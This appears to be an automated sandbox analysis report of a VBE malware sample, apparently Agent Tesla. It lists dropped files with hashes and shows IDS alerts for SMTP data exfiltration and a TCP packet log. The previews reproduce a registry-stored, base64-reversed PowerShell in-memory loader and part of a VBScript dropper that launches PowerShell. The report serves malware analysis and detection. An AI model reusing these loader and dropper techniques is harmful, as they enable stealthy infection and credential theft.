                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqpubcme.wth.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2cdss1s.2su.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):252
                                                                Entropy (8bit):5.401985169194339
                                                                Encrypted:false
                                                                SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83gMXTBDEoXZuBiA2V0LYERmBPyXFI59:772EtSXqd5ZEoJci1V0LYEIyo
                                                                MD5:73622137D903689DFEBD28DD0A5B17A8
                                                                SHA1:63AC79ADE35AB949BE311604267239D322CE42C1
                                                                SHA-256:CE201780D48B4687EA1F3D0F66DB0E415E9CF8653C297D466AA6B688213B03CC
                                                                SHA-512:D7E6728A57DF3D33FFC0ADFBCB6C376BD885AE43EE4EF44320AFCC3AAE22DAA19DD08DF5B3B8197F212B97F40E6E6863E3CB6F9909037F78D993EC850384DEF0
                                                                Malicious:false
                                                                Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\dirDChDJoZeRjid' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('dirDChDJoZeRjid')..Stop-Process -Name conhost -Force..

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7015427903408895
                                                                Encrypted:false
                                                                SSDEEP:96:8QwFdCteo7kvhkvCCtc23a+MHP23a+xHU:8QwFQeUc23+23M
                                                                MD5:4F2B713B6EBE6F92A346F9CE41A4F7A4
                                                                SHA1:33940515D07A15DB9F662E3CF9900E71F0113C1F
                                                                SHA-256:6979972E8E09B0C8C03B17239CD71F64FCA6C6C6DCA830EB4C0A0E0FAD679FD3
                                                                SHA-512:40A878D9B41BAC851C5D9C3BAE8E0E7BA4841C718DE771EA739B9984DA890986BBD03B05E51FEDDC766E2CFFF0C00909FA6EB280932C23A474168F2853E75E7F
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d.......(.].$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....].$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF479a81.TMP (copy)

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7015427903408895
                                                                Encrypted:false
                                                                SSDEEP:96:8QwFdCteo7kvhkvCCtc23a+MHP23a+xHU:8QwFQeUc23+23M
                                                                MD5:4F2B713B6EBE6F92A346F9CE41A4F7A4
                                                                SHA1:33940515D07A15DB9F662E3CF9900E71F0113C1F
                                                                SHA-256:6979972E8E09B0C8C03B17239CD71F64FCA6C6C6DCA830EB4C0A0E0FAD679FD3
                                                                SHA-512:40A878D9B41BAC851C5D9C3BAE8E0E7BA4841C718DE771EA739B9984DA890986BBD03B05E51FEDDC766E2CFFF0C00909FA6EB280932C23A474168F2853E75E7F
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d.......(.].$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....].$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P608ORYJ144CISTDHR3X.temp

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7015427903408895
                                                                Encrypted:false
                                                                SSDEEP:96:8QwFdCteo7kvhkvCCtc23a+MHP23a+xHU:8QwFQeUc23+23M
                                                                MD5:4F2B713B6EBE6F92A346F9CE41A4F7A4
                                                                SHA1:33940515D07A15DB9F662E3CF9900E71F0113C1F
                                                                SHA-256:6979972E8E09B0C8C03B17239CD71F64FCA6C6C6DCA830EB4C0A0E0FAD679FD3
                                                                SHA-512:40A878D9B41BAC851C5D9C3BAE8E0E7BA4841C718DE771EA739B9984DA890986BBD03B05E51FEDDC766E2CFFF0C00909FA6EB280932C23A474168F2853E75E7F
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d.......(.].$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....].$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlDW.r....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlDW.q....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlDW.q....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QPJ9ZTU2GAL7VTXY1PMN.temp

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.700906988898656
                                                                Encrypted:false
                                                                SSDEEP:48:Da9s/JCVbU2H+6BukvhkvklCyw8n2k2qqa+lIjSogZofE2qqa+lIjSogZoz1:+9QJCG97kvhkvCCtc23a+xHP23a+xHU
                                                                MD5:BA6F050EE8307A631209DF5FA4BFFB87
                                                                SHA1:A8F4976A73F3C65A04B180A2E5B9A3F0CAD72307
                                                                SHA-256:25F717A614DEF91B646BD4C8EA75EDB7F874B4745AFC7AB9EB5A7745E0333EF9
                                                                SHA-512:83744DBABB9AD085FA5C5CFB94F97DBD49BCD188AFC34522B94B996443B01FF3B9CA596E7E3673461559E4A8F9C96CC29A8CDCD3D33244B5F797CE55E7CA91A5
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d........b.$..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........V.$.....f.$......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlVY.e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....VY.e..Roaming.@......DWSlVY.e....C.......................5.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlVY.e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlVY.e....E......................$..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlVY.e....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlVY.e....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlVY.e....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlVY.e....q...........

                                                                C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbs

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:ISO-8859 text
                                                                Category:dropped
                                                                Size (bytes):2809
                                                                Entropy (8bit):4.971159920674946
                                                                Encrypted:false
                                                                SSDEEP:48:jQn8VxQ2Ii7jnHilEfzcub6OtzFnc3mqgjHVWRWvxdczYhfWgOq3WldACk8AYQAb:jQ8Vx99OOjcW7Iz08q+k9YDWg9QU
                                                                MD5:83DF580BFC1F30657B01031C6C23263A
                                                                SHA1:D7688ECB62A261B0EA6216617A4F3D5B66715536
                                                                SHA-256:BC2D8273C66E12ED28BA3A504601F26943DD950F8FAD00A51AC7112697653795
                                                                SHA-512:BFB08E2BE8F2AC17905FBCF0A4225ABA1FE4A1AC105F702BB37C96C0CC8FA84D1D81327D27112D55BA7FC3ED2B4CA60E91640F02610CB2AAD907E9A563007F28
                                                                Malicious:true
                                                                Preview:Option Explicit..' Nom du projet: dirDChDJoZeRjid.' Variables globales.Dim shellSysteme, cheminWindows, compteurBoucles.Set shellSysteme = CreateObject("WScript.Shell").cheminWindows = shellSysteme.ExpandEnvironmentStrings("%windir%")..' Initialisation des param.tres du programme.Sub InitialiserProgramme(). compteurBoucles = 0.End Sub..' Fonction pour v.rifier si un processus sp.cifique est en cours d'ex.cution.Function ProcessusEstActif(nomDuProcessus). Dim serviceWMI, listeProcessusActifs. Set serviceWMI = GetObject("winmgmts:\\.\root\cimv2"). Set listeProcessusActifs = serviceWMI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & nomDuProcessus & "'"). . ProcessusEstActif = (listeProcessusActifs.Count > 0).End Function..' Proc.dure pour lancer PowerShell.Sub LancerPowerShell(). shellSysteme.Run cheminWindows & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2.End Sub..' Fonction pour trouver un processus PowerShell en cours d'ex.cution.Function Rechercher

                                                                \Device\ConDrv

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                                Category:dropped
                                                                Size (bytes):1605
                                                                Entropy (8bit):4.425749981547822
                                                                Encrypted:false
                                                                SSDEEP:24:Eip7/tkNvNa2V269+Iz5JSjeKm3uSmcHugxOAX4WLeX4WgeX4WgeX4WneX4WueXZ:EcWxZzSyjOAX+X5XpXKX/XFXoXQXDX5
                                                                MD5:2B099B22D2137B9BFD17FC56E3F69280
                                                                SHA1:1124B137D2EB3E434A0CC969D6D229EFE37599F3
                                                                SHA-256:419EAC386ACEA5A77C46B9DAC14F29DC6C0DC0A3B377CEEF11CB847B9DC137CF
                                                                SHA-512:3E7DAD6CC6B6A1FCF27B05658CB1F3E444D596822B1C56CF54A59072FDDC6028B31EBD86924773CD31C4DB9EDD010BD74E64F7449AF7F12E2C6FD12EAE3ACE98
                                                                Malicious:false
                                                                Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mA.[33m.[45m.[0m.[33m[.[37mAp.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCu.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDoma.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\dirDChDJoZeRjid'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'dirDChDJoZeRjid'.[33m).[33m.[45m.[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m

                                                                Static File Info

                                                                General

                                                                File type:data
                                                                Entropy (8bit):3.939201181970454
                                                                TrID:
                                                                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                • MP3 audio (1001/1) 32.22%
                                                                • Lumena CEL bitmap (63/63) 2.03%
                                                                • Corel Photo Paint (41/41) 1.32%
                                                                File name:Ref#150689.vbe
                                                                File size:12'114 bytes
                                                                MD5:3ee57f19875a1b263377d8ab4af8f677
                                                                SHA1:619eec8b7c7a819a87959fd9026dc58dfe965e68
                                                                SHA256:3fa9114a2d3fddc77550a3567cac63db1bf0c72bebe23d9ceed62cf47ea68c34
                                                                SHA512:b53be96cec95ea0281a796e8c01f034c0739d9391bda447e67cc469d49643f2d8b0926c51a69b6a918beb4f51290501a621256fa2987437b67ad9249bbb89d13
                                                                SSDEEP:192:5JNhDRAnShs0fn5nwVFUKq2oJkNMG2BXtqzXlcFqF6SAzzAnJA0Y/7qOsK:nNs0fn5nwck4C098J2/7qOt
                                                                TLSH:12428844CE8D42C1E3216B976FCA9AD5172F9A21BF0F0BD52C6443D5232ADC1E566F32
                                                                File Content Preview:..#.@.~.^.j.x.c.A.A.A.=.=.v.9.k...G.Z.4.f.9.K.}...].L.b.N.@.#.@.&.}.w.O.r.K.x.P.A.a.w.^.k.m.b.O.@.#.@.&.@.#.@.&.E.P.M.e.M.~.;.W.U.\...../.b.....x.~.[...P.t.n.a.m.N.n.m.b.h.m.V.~.m.P.D.+.6.D.W.,.M.e.C.@.#.@.&.s.!.x.^.O.b.W.x.,./.W...\.+.M.O.r.D._.+.X.b.P.+

                                                                File Icon

                                                                Icon Hash:68d69b8f86ab9a86

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-22T14:45:59.281919+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549764162.254.34.31587TCP
                                                                2024-10-22T14:45:59.281919+02002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549764162.254.34.31587TCP
                                                                2024-10-22T14:46:31.537759+02002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549764162.254.34.31587TCP
                                                                2024-10-22T14:46:31.537759+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549764162.254.34.31587TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 22, 2024 14:46:03.726713896 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:03.732211113 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:03.732393026 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:03.732659101 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:03.737960100 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588548899 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588563919 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588589907 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588601112 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588610888 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588620901 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.588850975 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.589106083 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.589116096 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.589122057 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.589168072 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.589391947 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.589493036 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.594352007 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.594404936 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.594417095 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.594538927 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.594558001 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.594609976 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.719301939 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719367027 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719378948 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719438076 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.719600916 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719649076 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.719676971 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719779968 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719825983 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.719856024 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719927073 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.719964981 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.720086098 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.720097065 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.720107079 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.720134020 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.720627069 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.720679045 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.720685005 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:04.765830994 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:04.771303892 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021224976 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021281958 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021318913 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021353006 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021354914 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.021394014 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.021533966 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021564007 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021606922 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.021636963 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021791935 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021825075 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.021833897 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.021996975 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.022047043 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.022438049 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.022571087 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.022604942 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.022615910 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.022818089 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.022871017 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.023242950 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.023392916 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.023428917 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.023437977 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.023576021 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.023626089 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.024044037 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024096966 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024130106 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024138927 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.024333954 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024384022 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.024842024 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024893999 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024928093 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.024935961 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.078775883 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.138569117 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.138662100 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.138700008 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.138729095 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.138745070 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.138781071 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.138796091 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.139024019 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.139060020 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.139076948 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.139276028 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.139333010 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.139311075 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.188122034 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.246551037 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.252235889 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502326012 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502393007 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502405882 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502573013 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502572060 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.502584934 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502623081 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.502794981 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.502859116 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.502909899 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503086090 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503098011 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503108025 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503133059 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.503144979 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.503365993 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503490925 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503503084 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.503534079 CEST4970580192.168.2.5144.91.79.54
